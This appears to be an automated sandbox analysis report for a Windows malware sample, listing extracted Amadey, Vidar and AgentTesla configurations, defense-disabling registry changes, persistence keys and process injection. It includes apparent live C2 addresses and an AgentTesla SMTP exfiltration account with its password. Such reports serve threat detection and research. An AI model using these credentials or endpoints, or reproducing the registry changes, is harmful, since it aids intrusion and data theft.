agenttesla | 48cdd34c1d5194805bb63e4d865ff8ce52d2c7a8aa2e0fbb24b8b73c00a28b6b

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 19:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

amadey

Version

5.03

Botnet

7c4393

http://185.215.113.217

Attributes

install_dir
f9c76c1660
install_file
corept.exe
strings_key
9808a67f01d2f0720518035acbde7521
url_paths
/CoreOPT/index.php

rc4.plain

Extracted

Family

vidar

Version

11.1

Botnet

df523263f44cc8d55414a260a0197e4a

https://steamcommunity.com/profiles/76561199786602107

https://t.me/lpnjoke

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.worlorderbillions.top
Port:
587
Username:
[email protected]
Password:
3^?r?mtxk(kt
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\vidar.exe	family_vidar_v7
behavioral2/memory/1172-682-0x0000000000390000-0x0000000000606000-memory.dmp	family_vidar_v7
behavioral2/memory/1172-982-0x0000000000390000-0x0000000000606000-memory.dmp	family_vidar_v7

Modifies security service 2 TTPs 3 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

sysklnorbcv.exesysppvrdnvs.exesysvplervcs.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysvplervcs.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Phorphiex family
phorphiex

Phorphiex payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe	family_phorphiex
C:\Users\Admin\AppData\Local\Temp\Files\pi.exe	family_phorphiex
C:\Users\Admin\AppData\Local\Temp\Files\s.exe	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

Processes:

Jurisdiction.pif2654516695.exewinupsecvmgr.execonhost.exewinupsecvmgr.exe

description	pid	process	target process
PID 2388 created 3320	2388	Jurisdiction.pif	Explorer.EXE
PID 2388 created 3320	2388	Jurisdiction.pif	Explorer.EXE
PID 2404 created 3320	2404	2654516695.exe	Explorer.EXE
PID 2404 created 3320	2404	2654516695.exe	Explorer.EXE
PID 4072 created 3320	4072	winupsecvmgr.exe	Explorer.EXE
PID 4072 created 3320	4072	winupsecvmgr.exe	Explorer.EXE
PID 4072 created 3320	4072	winupsecvmgr.exe	Explorer.EXE
PID 2968 created 3320	2968	conhost.exe	Explorer.EXE
PID 2968 created 3320	2968	conhost.exe	Explorer.EXE
PID 2564 created 3320	2564	winupsecvmgr.exe	Explorer.EXE
PID 2564 created 3320	2564	winupsecvmgr.exe	Explorer.EXE

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Windows security bypass 2 TTPs 18 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysvplervcs.exesysklnorbcv.exesysppvrdnvs.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysvplervcs.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4072-952-0x00007FF604280000-0x00007FF604817000-memory.dmp	xmrig
behavioral2/memory/4084-954-0x00007FF63CEF0000-0x00007FF63D6DF000-memory.dmp	xmrig
behavioral2/memory/2564-1052-0x00007FF604280000-0x00007FF604817000-memory.dmp	xmrig
behavioral2/memory/2340-1059-0x00007FF716370000-0x00007FF716B5F000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

5044 powershell.exe
5024 powershell.exe
2164 powershell.exe
940 powershell.exe
3240 powershell.exe
4984 powershell.exe
540 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sysvplervcs.exe4363463463464363463463463.exesplwow64.exesysklnorbcv.exe75608328.exesysppvrdnvs.exevidar.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	sysvplervcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	splwow64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	sysklnorbcv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	75608328.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	vidar.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url	cmd.exe

Executes dropped EXE 24 IoCs

Processes:

t1.exesplwow64.exesysklnorbcv.exeJurisdiction.pifbandwidth_monitor.exevidar.exeggg.exeggg.exengown.exeSet_up.exeaaa.exe75608328.exe1672332105.exe2042823420.exe234414530.exe2654516695.exewinupsecvmgr.exenefor.exepi.exesysppvrdnvs.exes.exeSurvox.exesysvplervcs.exewinupsecvmgr.exe

pid	process
4232	t1.exe
3928	splwow64.exe
3068	sysklnorbcv.exe
2388	Jurisdiction.pif
3752	bandwidth_monitor.exe
1172	vidar.exe
2876	ggg.exe
364	ggg.exe
4384	ngown.exe
232	Set_up.exe
5064	aaa.exe
4676	75608328.exe
4356	1672332105.exe
4064	2042823420.exe
4232	234414530.exe
2404	2654516695.exe
4072	winupsecvmgr.exe
3456	nefor.exe
2828	pi.exe
2980	sysppvrdnvs.exe
628	s.exe
1652	Survox.exe
4672	sysvplervcs.exe
2564	winupsecvmgr.exe

Loads dropped DLL 5 IoCs

Processes:

ggg.exevidar.exe

pid process

364 ggg.exe
364 ggg.exe
364 ggg.exe
1172 vidar.exe
1172 vidar.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

pid	process
364	ggg.exe
364	ggg.exe
364	ggg.exe
1172	vidar.exe
1172	vidar.exe

Windows security modification 2 TTPs 21 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysppvrdnvs.exesysvplervcs.exesysklnorbcv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysklnorbcv.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

t1.exebandwidth_monitor.exepi.exeSurvox.exes.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe"	t1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BandwidthMonitor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\bandwidth_monitor.exe"	bandwidth_monitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	pi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NTFS Manager = "C:\\Program Files (x86)\\NTFS Manager\\ntfsmgr.exe"	Survox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe"	s.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Survox.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Survox.exe
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1474 bitbucket.org
1476 bitbucket.org

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Survox.exe

flow	ioc
1474	bitbucket.org
1476	bitbucket.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4832 tasklist.exe
3268 tasklist.exe

pid	process
4832	tasklist.exe
3268	tasklist.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

ngown.exewinupsecvmgr.exewinupsecvmgr.exe

description	pid	process	target process
PID 4384 set thread context of 4876	4384	ngown.exe	RegSvcs.exe
PID 4072 set thread context of 2968	4072	winupsecvmgr.exe	conhost.exe
PID 4072 set thread context of 4084	4072	winupsecvmgr.exe	dwm.exe
PID 2564 set thread context of 2340	2564	winupsecvmgr.exe	dwm.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ggg.exe	upx
behavioral2/memory/2876-699-0x00007FF6CF9E0000-0x00007FF6CFA4C000-memory.dmp	upx
behavioral2/memory/364-790-0x00007FF6CF9E0000-0x00007FF6CFA4C000-memory.dmp	upx
behavioral2/memory/2876-791-0x00007FF6CF9E0000-0x00007FF6CFA4C000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

Survox.exe

description	ioc	process
File created	C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe	Survox.exe
File opened for modification	C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe	Survox.exe

Drops file in Windows directory 12 IoCs

Processes:

splwow64.exet1.exepi.exes.exe

description	ioc	process
File opened for modification	C:\Windows\HomelessLaser	splwow64.exe
File opened for modification	C:\Windows\ActuallyFtp	splwow64.exe
File created	C:\Windows\sysklnorbcv.exe	t1.exe
File opened for modification	C:\Windows\sysklnorbcv.exe	t1.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	pi.exe
File created	C:\Windows\sysvplervcs.exe	s.exe
File opened for modification	C:\Windows\LuggageRepresentations	splwow64.exe
File opened for modification	C:\Windows\AdditionsSalvation	splwow64.exe
File created	C:\Windows\sysppvrdnvs.exe	pi.exe
File opened for modification	C:\Windows\sysvplervcs.exe	s.exe
File opened for modification	C:\Windows\SixCream	splwow64.exe
File opened for modification	C:\Windows\EauOfficial	splwow64.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2788	sc.exe
4020	sc.exe
4368	sc.exe
760	sc.exe
2580	sc.exe
2584	sc.exe
1948	sc.exe
3816	sc.exe
2960	sc.exe
3336	sc.exe
4652	sc.exe
2696	sc.exe
3744	sc.exe
3652	sc.exe
3252	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

RegSvcs.exesc.exet1.exetasklist.exefindstr.exefindstr.exesc.exesc.exeSurvox.exesysklnorbcv.execmd.exesc.execmd.exe4363463463464363463463463.exefindstr.exetasklist.exengown.exepi.execmd.exesc.execmd.execmd.execmd.exepowershell.exepowershell.exeJurisdiction.pifsc.exepowershell.exesc.exeaaa.exesc.execmd.exesc.exetimeout.exes.execmd.exeSet_up.execmd.exesysvplervcs.exesplwow64.exeschtasks.exe234414530.exesysppvrdnvs.execmd.exesc.exe1672332105.exe2042823420.exechoice.execmd.exesc.exesc.exesc.exesc.execmd.exevidar.exesc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	t1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Survox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysklnorbcv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ngown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jurisdiction.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aaa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Set_up.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysvplervcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	splwow64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	234414530.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1672332105.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2042823420.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vidar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

vidar.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vidar.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vidar.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4164 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2580 schtasks.exe

pid	process
4164	timeout.exe

pid	process
2580	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeJurisdiction.pifvidar.exeRegSvcs.exe75608328.exe2654516695.exepowershell.exewinupsecvmgr.exepowershell.exe

pid	process
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
1172	vidar.exe
1172	vidar.exe
1172	vidar.exe
1172	vidar.exe
4876	RegSvcs.exe
4876	RegSvcs.exe
4876	RegSvcs.exe
4676	75608328.exe
4676	75608328.exe
1172	vidar.exe
1172	vidar.exe
2404	2654516695.exe
2404	2654516695.exe
3240	powershell.exe
3240	powershell.exe
2404	2654516695.exe
2404	2654516695.exe
4072	winupsecvmgr.exe
4072	winupsecvmgr.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
4072	winupsecvmgr.exe
4072	winupsecvmgr.exe
4072	winupsecvmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Survox.exe

pid process

1652 Survox.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

ngown.exe

pid process

4384 ngown.exe
Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

Survox.exesysppvrdnvs.exe

pid process

1652 Survox.exe
2980 sysppvrdnvs.exe

pid	process
1652	Survox.exe

pid	process
4384	ngown.exe

pid	process
1652	Survox.exe
2980	sysppvrdnvs.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

